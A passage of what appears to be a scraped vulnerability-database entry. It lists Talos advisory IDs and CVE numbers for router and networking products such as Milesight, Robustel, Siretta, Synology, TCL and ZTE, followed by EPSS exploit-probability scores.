| [TALOS-2023-1723](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1723>) | CVE-2023-25582 - CVE-2023-25583 | Milesight UR32L |
| [TALOS-2023-1718](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1718>) | CVE-2023-24019 | Milesight UR32L |
| [TALOS-2023-1716](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1716>) | CVE-2023-25081 - CVE-2023-25124 | Milesight UR32L |
| [TALOS-2023-1715](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1715>) | CVE-2023-24018 | Milesight UR32L |
| [TALOS-2023-1714](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1714>) | CVE-2023-22653 | Milesight UR32L |
| [TALOS-2023-1713](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1713>) | CVE-2023-24595 | Milesight UR32L |
| [TALOS-2023-1712](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1712>) | CVE-2023-22299 | Milesight UR32L |
| [TALOS-2023-1711](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1711>) | CVE-2023-22365 | Milesight UR32L |
| [TALOS-2023-1710](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1710>) | CVE-2023-24582 - CVE-2023-24583 | Milesight UR32L |
\n[TALOS-2023-1706](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1706>)\n\n| \n\nCVE-2023-24519 - CVE-2023-24520\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1705](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1705>)\n\n| \n\nCVE-2023-23546\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1699](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1699>)\n\n| \n\nCVE-2023-22659\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1698](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1698>)\n\n| \n\nCVE-2023-22306\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1697](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1697>)\n\n| \n\nCVE-2023-23902\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1696](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1696>)\n\n| \n\nCVE-2023-23571\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1695](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1695>)\n\n| \n\nCVE-2023-23547\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1694](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1694>)\n\n| \n\nCVE-2023-23550\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1704](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1704>)\n\n| \n\nCVE-2023-24496 - CVE-2023-24497\n\n| \n\nMilesightVPN \n \n[TALOS-2023-1703](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1703>)\n\n| \n\nCVE-2023-22371\n\n| \n\nMilesightVPN \n \n[TALOS-2023-1702](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1702>)\n\n| \n\nCVE-2023-23907\n\n| \n\nMilesightVPN \n \n[TALOS-2023-1701](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1701>)\n\n| \n\nCVE-2023-22319\n\n| \n\nMilesightVPN \n \n[TALOS-2023-1700](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1700>)\n\n| \n\nCVE-2023-22844\n\n| \n\nMilesightVPN \n \n[TALOS-2022-1598](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1598>)\n\n| 
\n\nCVE-2022-38458\n\n| \n\nNetgear Orbi Router RBR750 \n \n[TALOS-2022-1597](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1597>)\n\n| \n\nCVE-2022-36429\n\n| \n\nNetgear Orbi Satellite RBS750 \n \n[TALOS-2022-1596](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1596>)\n\n| \n\nCVE-2022-37337\n\n| \n\nNetgear Orbi Router RBR750 \n \n[TALOS-2022-1595](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1595>)\n\n| \n\nCVE-2022-38452\n\n| \n\nNetgear Orbi Router RBR750 \n \n[TALOS-2019-0893](<https://talosintelligence.com/vulnerability_reports/TALOS-2019-0893>)\n\n| \n\n\u200b\u200bCVE-2019-5101 - CVE-2019-5102\n\n| \n\nOpenWrt \n \n[TALOS-2022-1580](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1580>)\n\n| \n\nCVE-2022-34845\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1579](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1579>)\n\n| \n\nCVE-2022-33897\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1578](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1578>)\n\n| \n\nCVE-2022-34850\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1577](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1577>)\n\n| \n\nCVE-2022-33150\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1576](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1576>)\n\n| \n\nCVE-2022-32765\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1575](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1575>)\n\n| \n\nCVE-2022-35261-CVE-2022-35271\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1573](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1573>)\n\n| \n\nCVE-2022-33325-CVE-2022-33329\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1572](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1572>)\n\n| \n\nCVE-2022-33312-CVE-2022-33314\n\n| \n\nRobustel R1510 \n 
\n[TALOS-2022-1571](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1571>)\n\n| \n\nCVE-2022-28127\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1570](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1570>)\n\n| \n\nCVE-2022-32585\n\n| \n\nRobustel R1510 \n \n[TALOS-2018-0756](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0756>)\n\n| \n\nCVE-2018-4072 - CVE-2018-4073\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0755](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0755>)\n\n| \n\nCVE-2018-4070 - CVE-2018-4071\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0754](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0754>)\n\n| \n\nCVE-2018-4069\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0753](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0753>)\n\n| \n\nCVE-2018-4068\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0752](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0752>)\n\n| \n\nCVE-2018-4067\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0751](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0751>)\n\n| \n\nCVE-2018-4066\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0750](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0750>)\n\n| \n\nCVE-2018-4065\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0749](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0749>)\n\n| \n\nCVE-2018-4064\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0748](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0748>)\n\n| \n\nCVE-2018-4063\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0747](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0747>)\n\n| \n\nCVE-2018-4062\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0746](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0746>)\n\n| \n\nCVE-2018-4061\n\n| \n\nSierra 
Wireless Airlink \n \n[TALOS-2022-1640](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640>)\n\n| \n\nCVE-2022-42490-CVE-2022-42493\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1639](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639>)\n\n| \n\nCVE-2022-41991\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1638](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638>)\n\n| \n\nCVE-2022-40222\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1637](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637>)\n\n| \n\nCVE-2022-41154\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1615](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615>)\n\n| \n\nCVE-2022-38066\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1613](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613>)\n\n| \n\nCVE-2022-40985-CVE-2022-41030\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1612](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612>)\n\n| \n\nCVE-2022-40220\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1611](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611>)\n\n| \n\nCVE-2022-39045\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1610](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610>)\n\n| \n\nCVE-2022-38715\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1609](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609>)\n\n| \n\nCVE-2022-38088\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1608](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608>)\n\n| \n\nCVE-2022-38459\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1607](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607>)\n\n| \n\nCVE-2022-40969\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1606](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606>)\n\n| \n\nCVE-2022-40701\n\n| \n\nSiretta 
QUARTZ-GOLD \n \n[TALOS-2022-1605](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605>)\n\n| \n\nCVE-2022-36279\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2020-1064](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1064>)\n\n| \n\nNone (Cloud)\n\n| \n\nSynology QuickConnect \n \n[TALOS-2020-1060](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1060>)\n\n| \n\nNone (Cloud)\n\n| \n\nSynology QuickConnect \n \n[TALOS-2020-1087](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1087>)\n\n| \n\nCVE-2020-27659-CVE-2020-27660\n\n| \n\nSynology SRM \n \n[TALOS-2020-1086](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1086>)\n\n| \n\nCVE-2020-27658\n\n| \n\nSynology SRM \n \n[TALOS-2020-1071](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1071>)\n\n| \n\nCVE-2020-27656-CVE-2020-27657\n\n| \n\nSynology SRM \n \n[TALOS-2020-1066](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1066>)\n\n| \n\nCVE-2020-27655\n\n| \n\nSynology SRM \n \n[TALOS-2020-1065](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1065>)\n\n| \n\nCVE-2020-27654, CVE-2020-11117\n\n| \n\nSynology SRM \n \n[TALOS-2020-1061](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1061>)\n\n| \n\nCVE-2020-27652-CVE-2020-27653\n\n| \n\nSynology SRM \n \n[TALOS-2020-1059](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1059>)\n\n| \n\nCVE-2020-27650-CVE-2020-27651\n\n| \n\nSynology SRM \n \n[TALOS-2020-1058](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1058>)\n\n| \n\nCVE-2020-27648-CVE-2020-27649\n\n| \n\nSynology SRM \n \n[TALOS-2020-1051](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1051>)\n\n| \n\nCVE-2019-11823\n\n| \n\nSynology SRM \n \n[TALOS-2022-1507](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1507>)\n\n| \n\nCVE-2022-26346\n\n| \n\nTCL LinkHub Mesh Wifi \n 
\n[TALOS-2022-1506](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1506>)\n\n| \n\nCVE-2022-27178\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1505](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1505>)\n\n| \n\nCVE-2022-27185\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1504](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1504>)\n\n| \n\nCVE-2022-27630\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1503](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1503>)\n\n| \n\nCVE-2022-27633\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1502](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1502>)\n\n| \n\nCVE-2022-27660\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1484](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1484>)\n\n| \n\nCVE-2022-26342\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1483](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1483>)\n\n| \n\nCVE-2022-26009\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1482](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1482>)\n\n| \n\nCVE-2022-25996\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1463](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1463>)\n\n| \n\nCVE-2022-24005 - CVE-2022-24029\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1462](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1462>)\n\n| \n\nCVE-2022-23103\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1459](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1459>)\n\n| \n\nCVE-2022-22144\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1458](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1458>)\n\n| \n\nCVE-2022-22140\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1457](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1457>)\n\n| \n\nCVE-2022-21178\n\n| \n\nTCL LinkHub Mesh 
Wifi \n \n[TALOS-2022-1456](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1456>)\n\n| \n\nCVE-2022-21201\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1455](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1455>)\n\n| \n\nCVE-2022-23918 - CVE-2022-23919\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1454](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1454>)\n\n| \n\nCVE-2022-23399\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2018-0620](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0620>)\n\n| \n\nCVE-2018-3951\n\n| \n\nTP-Link TL-R600VPN \n \n[TALOS-2018-0619](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0619>)\n\n| \n\nCVE-2018-3950\n\n| \n\nTP-Link TL-R600VPN \n \n[TALOS-2018-0618](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0618>)\n\n| \n\nCVE-2018-3949\n\n| \n\nTP-Link TL-R600VPN \n \n[TALOS-2018-0617](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0617>)\n\n| \n\nCVE-2018-3948\n\n| \n\nTP-Link TL-R600VPN \n \n[TALOS-2021-1321](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1321>)\n\n| \n\nCVE-2021-21749\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1320](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1320>)\n\n| \n\nCVE-2021-21748\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1319](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1319>)\n\n| \n\nCVE-2021-21747\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1318](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1318>)\n\n| \n\nCVE-2021-21746\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1317](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1317>)\n\n| \n\nCVE-2021-21745\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1316](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1316>)\n\n| \n\nCVE-2021-21744\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1313](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1313>)\n\n| 
\n\nCVE-2021-21743\n\n| \n\nZTE MF971R", "published": "2023-08-02T12:00:19", "modified": "2023-08-02T12:00:19", "epss": [{"cve": "CVE-2018-3948", "epss": 0.00098, "percentile": 0.3973, "modified": "2023-06-23"}, {"cve": "CVE-2018-3949", "epss": 0.20956, "percentile": 0.95704, "modified": "2023-06-23"}, {"cve": "CVE-2018-3950", "epss": 0.00642, "percentile": 0.76336, "modified": "2023-06-23"}, {"cve": "CVE-2018-3951", "epss": 0.00152, "percentile": 0.50277, "modified": "2023-06-23"}, {"cve": "CVE-2018-3953", "epss": 0.00271, "percentile": 0.63237, "modified": "2023-06-23"}, {"cve": "CVE-2018-3955", "epss": 0.00301, "percentile": 0.6521, "modified": "2023-06-23"}, {"cve": "CVE-2018-4061", "epss": 0.0041, "percentile": 0.70239, "modified": "2023-06-23"}, {"cve": "CVE-2018-4062", "epss": 0.13942, "percentile": 0.94872, "modified": "2023-06-23"}, {"cve": "CVE-2018-4063", "epss": 0.00503, "percentile": 0.73119, "modified": "2023-06-23"}, {"cve": "CVE-2018-4064", "epss": 0.00237, "percentile": 0.60543, "modified": "2023-06-23"}, {"cve": "CVE-2018-4065", "epss": 0.00205, "percentile": 0.57262, "modified": "2023-06-23"}, {"cve": "CVE-2018-4066", "epss": 0.42165, "percentile": 0.96805, "modified": "2023-06-23"}, {"cve": "CVE-2018-4067", "epss": 0.00068, "percentile": 0.28093, "modified": "2023-06-23"}, {"cve": "CVE-2018-4068", "epss": 0.00084, "percentile": 0.34379, "modified": "2023-06-23"}, {"cve": "CVE-2018-4069", "epss": 0.00202, "percentile": 0.569, "modified": "2023-06-23"}, {"cve": "CVE-2018-4070", "epss": 0.09898, "percentile": 0.94002, "modified": "2023-06-23"}, {"cve": "CVE-2018-4071", "epss": 0.09898, "percentile": 0.94002, "modified": "2023-06-23"}, {"cve": "CVE-2018-4072", "epss": 0.07768, "percentile": 0.93261, "modified": "2023-06-23"}, {"cve": "CVE-2018-4073", "epss": 0.07768, "percentile": 0.93261, "modified": "2023-06-23"}, {"cve": "CVE-2019-11823", "epss": 0.00146, "percentile": 0.49417, "modified": "2023-06-13"}, {"cve": "CVE-2019-5016", "epss": 0.00421, 
"percentile": 0.70579, "modified": "2023-06-13"}, {"cve": "CVE-2019-5017", "epss": 0.00109, "percentile": 0.42582, "modified": "2023-06-13"}, {"cve": "CVE-2019-5101", "epss": 0.00107, "percentile": 0.42603, "modified": "2023-07-20"}, {"cve": "CVE-2019-5102", "epss": 0.00107, "percentile": 0.42603, "modified": "2023-07-20"}, {"cve": "CVE-2020-11117", "epss": 0.00652, "percentile": 0.765, "modified": "2023-06-06"}, {"cve": "CVE-2020-27648", "epss": 0.00086, "percentile": 0.35139, "modified": "2023-06-06"}, {"cve": "CVE-2020-27649", "epss": 0.00086, "percentile": 0.35139, "modified": "2023-06-06"}, {"cve": "CVE-2020-27650", "epss": 0.00116, "percentile": 0.44272, "modified": "2023-06-06"}, {"cve": "CVE-2020-27651", "epss": 0.00169, "percentile": 0.52648, "modified": "2023-06-06"}, {"cve": "CVE-2020-27652", "epss": 0.00112, "percentile": 0.43373, "modified": "2023-06-06"}, {"cve": "CVE-2020-27653", "epss": 0.00112, "percentile": 0.43373, "modified": "2023-06-06"}, {"cve": "CVE-2020-27654", "epss": 0.01319, "percentile": 0.84031, "modified": "2023-06-06"}, {"cve": "CVE-2020-27655", "epss": 0.0015, "percentile": 0.49896, "modified": "2023-06-06"}, {"cve": "CVE-2020-27656", "epss": 0.0007, "percentile": 0.28516, "modified": "2023-06-06"}, {"cve": "CVE-2020-27657", "epss": 0.0012, "percentile": 0.44976, "modified": "2023-06-06"}, {"cve": "CVE-2020-27658", "epss": 0.00171, "percentile": 0.52843, "modified": "2023-06-06"}, {"cve": "CVE-2020-27659", "epss": 0.00077, "percentile": 0.31411, "modified": "2023-06-06"}, {"cve": "CVE-2020-27660", "epss": 0.00165, "percentile": 0.51866, "modified": "2023-06-06"}, {"cve": "CVE-2021-21743", "epss": 0.00156, "percentile": 0.50721, "modified": "2023-05-27"}, {"cve": "CVE-2021-21744", "epss": 0.00073, "percentile": 0.30122, "modified": "2023-05-27"}, {"cve": "CVE-2021-21745", "epss": 0.46046, "percentile": 0.96866, "modified": "2023-05-27"}, {"cve": "CVE-2021-21746", "epss": 0.00072, "percentile": 0.29582, "modified": "2023-05-27"}, 
{"cve": "CVE-2021-21747", "epss": 0.00072, "percentile": 0.29582, "modified": "2023-05-27"}, {"cve": "CVE-2021-21748", "epss": 0.00293, "percentile": 0.64636, "modified": "2023-05-27"}, {"cve": "CVE-2021-21749", "epss": 0.00293, "percentile": 0.64636, "modified": "2023-05-27"}, {"cve": "CVE-2021-21816", "epss": 0.00337, "percentile": 0.67047, "modified": "2023-05-27"}, {"cve": "CVE-2021-21817", "epss": 0.00193, "percentile": 0.55716, "modified": "2023-05-27"}, {"cve": "CVE-2021-21818", "epss": 0.00086, "percentile": 0.35054, "modified": "2023-05-27"}, {"cve": "CVE-2021-21819", "epss": 0.00141, "percentile": 0.48543, "modified": "2023-05-27"}, {"cve": "CVE-2021-21820", "epss": 0.00355, "percentile": 0.67887, "modified": "2023-05-27"}, {"cve": "CVE-2021-21913", "epss": 0.00285, "percentile": 0.64036, "modified": "2023-05-27"}, {"cve": "CVE-2022-21178", "epss": 0.00105, "percentile": 0.41674, "modified": "2023-06-17"}, {"cve": "CVE-2022-21182", "epss": 0.00074, "percentile": 0.30652, "modified": "2023-08-01"}, {"cve": "CVE-2022-21201", "epss": 0.00108, "percentile": 0.42515, "modified": "2023-06-17"}, {"cve": "CVE-2022-21238", "epss": 0.00142, "percentile": 0.48871, "modified": "2023-06-17"}, {"cve": "CVE-2022-21809", "epss": 0.0006, "percentile": 0.23361, "modified": "2023-06-14"}, {"cve": "CVE-2022-22140", "epss": 0.00105, "percentile": 0.41649, "modified": "2023-06-14"}, {"cve": "CVE-2022-22144", "epss": 0.00106, "percentile": 0.41987, "modified": "2023-06-14"}, {"cve": "CVE-2022-23103", "epss": 0.00085, "percentile": 0.34781, "modified": "2023-06-14"}, {"cve": "CVE-2022-23399", "epss": 0.00085, "percentile": 0.34781, "modified": "2023-06-14"}, {"cve": "CVE-2022-23918", "epss": 0.00085, "percentile": 0.34781, "modified": "2023-06-14"}, {"cve": "CVE-2022-23919", "epss": 0.00085, "percentile": 0.34781, "modified": "2023-06-14"}, {"cve": "CVE-2022-24005", "epss": 0.00087, "percentile": 0.36034, "modified": "2023-06-14"}, {"cve": "CVE-2022-24029", "epss": 0.00087, 
"percentile": 0.36034, "modified": "2023-06-14"}, {"cve": "CVE-2022-24910", "epss": 0.00083, "percentile": 0.34169, "modified": "2023-06-14"}, {"cve": "CVE-2022-25172", "epss": 0.00065, "percentile": 0.26738, "modified": "2023-06-25"}, {"cve": "CVE-2022-25932", "epss": 0.00091, "percentile": 0.37833, "modified": "2023-06-14"}, {"cve": "CVE-2022-25995", "epss": 0.00139, "percentile": 0.48217, "modified": "2023-06-14"}, {"cve": "CVE-2022-25996", "epss": 0.00085, "percentile": 0.34781, "modified": "2023-06-14"}, {"cve": "CVE-2022-26002", "epss": 0.0029, "percentile": 0.64534, "modified": "2023-06-14"}, {"cve": "CVE-2022-26007", "epss": 0.00162, "percentile": 0.51715, "modified": "2023-06-14"}, {"cve": "CVE-2022-26009", "epss": 0.00085, "percentile": 0.34781, "modified": "2023-06-14"}, {"cve": "CVE-2022-26020", "epss": 0.00067, "percentile": 0.27836, "modified": "2023-07-19"}, {"cve": "CVE-2022-26023", "epss": 0.00045, "percentile": 0.12457, "modified": "2023-06-14"}, {"cve": "CVE-2022-26042", "epss": 0.00162, "percentile": 0.51715, "modified": "2023-06-14"}, {"cve": "CVE-2022-26075", "epss": 0.00287, "percentile": 0.64284, "modified": "2023-06-14"}, {"cve": "CVE-2022-26085", "epss": 0.00968, "percentile": 0.81163, "modified": "2023-06-14"}, {"cve": "CVE-2022-26342", "epss": 0.00087, "percentile": 0.36034, "modified": "2023-06-14"}, {"cve": "CVE-2022-26346", "epss": 0.00106, "percentile": 0.41987, "modified": "2023-06-14"}, {"cve": "CVE-2022-26376", "epss": 0.00106, "percentile": 0.41876, "modified": "2023-06-14"}, {"cve": "CVE-2022-26420", "epss": 0.00287, "percentile": 0.64284, "modified": "2023-06-14"}, {"cve": "CVE-2022-26510", "epss": 0.00049, "percentile": 0.16302, "modified": "2023-06-03"}, {"cve": "CVE-2022-26518", "epss": 0.00258, "percentile": 0.62163, "modified": "2023-06-03"}, {"cve": "CVE-2022-26780", "epss": 0.00233, "percentile": 0.60059, "modified": "2023-06-03"}, {"cve": "CVE-2022-26782", "epss": 0.00259, "percentile": 0.62686, "modified": 
"2023-07-19"}, {"cve": "CVE-2022-27172", "epss": 0.00114, "percentile": 0.4377, "modified": "2023-06-03"}, {"cve": "CVE-2022-27178", "epss": 0.00106, "percentile": 0.41931, "modified": "2023-06-03"}, {"cve": "CVE-2022-27185", "epss": 0.00046, "percentile": 0.13993, "modified": "2023-06-03"}, {"cve": "CVE-2022-27630", "epss": 0.00084, "percentile": 0.34389, "modified": "2023-06-03"}, {"cve": "CVE-2022-27631", "epss": 0.00106, "percentile": 0.41822, "modified": "2023-06-03"}, {"cve": "CVE-2022-27633", "epss": 0.00077, "percentile": 0.3171, "modified": "2023-06-03"}, {"cve": "CVE-2022-27660", "epss": 0.00065, "percentile": 0.26637, "modified": "2023-06-03"}, {"cve": "CVE-2022-28127", "epss": 0.00094, "percentile": 0.3902, "modified": "2023-07-19"}, {"cve": "CVE-2022-28664", "epss": 0.00097, "percentile": 0.39509, "modified": "2023-06-03"}, {"cve": "CVE-2022-28665", "epss": 0.00106, "percentile": 0.41822, "modified": "2023-06-03"}, {"cve": "CVE-2022-28689", "epss": 0.0005, "percentile": 0.16856, "modified": "2023-06-03"}, {"cve": "CVE-2022-29481", "epss": 0.00045, "percentile": 0.12458, "modified": "2023-06-03"}, {"cve": "CVE-2022-29888", "epss": 0.00045, "percentile": 0.12439, "modified": "2023-06-03"}, {"cve": "CVE-2022-30543", "epss": 0.0005, "percentile": 0.16856, "modified": "2023-06-03"}, {"cve": "CVE-2022-32585", "epss": 0.00167, "percentile": 0.52184, "modified": "2023-06-03"}, {"cve": "CVE-2022-32765", "epss": 0.00168, "percentile": 0.52522, "modified": "2023-06-03"}, {"cve": "CVE-2022-33150", "epss": 0.00105, "percentile": 0.41588, "modified": "2023-06-03"}, {"cve": "CVE-2022-33312", "epss": 0.00144, "percentile": 0.49015, "modified": "2023-06-03"}, {"cve": "CVE-2022-33314", "epss": 0.00144, "percentile": 0.49015, "modified": "2023-06-03"}, {"cve": "CVE-2022-33325", "epss": 0.00144, "percentile": 0.49015, "modified": "2023-06-03"}, {"cve": "CVE-2022-33329", "epss": 0.00144, "percentile": 0.49015, "modified": "2023-06-03"}, {"cve": "CVE-2022-33897", "epss": 
0.00058, "percentile": 0.22051, "modified": "2023-06-03"}, {"cve": "CVE-2022-34845", "epss": 0.00045, "percentile": 0.11954, "modified": "2023-06-03"}, {"cve": "CVE-2022-34850", "epss": 0.00067, "percentile": 0.27599, "modified": "2023-06-03"}, {"cve": "CVE-2022-35261", "epss": 0.00046, "percentile": 0.13993, "modified": "2023-06-03"}, {"cve": "CVE-2022-35271", "epss": 0.00046, "percentile": 0.12751, "modified": "2023-06-03"}, {"cve": "CVE-2022-35401", "epss": 0.00106, "percentile": 0.41822, "modified": "2023-06-03"}, {"cve": "CVE-2022-36279", "epss": 0.0008, "percentile": 0.32916, "modified": "2023-06-03"}, {"cve": "CVE-2022-36429", "epss": 0.00054, "percentile": 0.19714, "modified": "2023-06-03"}, {"cve": "CVE-2022-37337", "epss": 0.00059, "percentile": 0.23062, "modified": "2023-06-03"}, {"cve": "CVE-2022-38066", "epss": 0.00067, "percentile": 0.27599, "modified": "2023-06-03"}, {"cve": "CVE-2022-38088", "epss": 0.00068, "percentile": 0.28083, "modified": "2023-06-03"}, 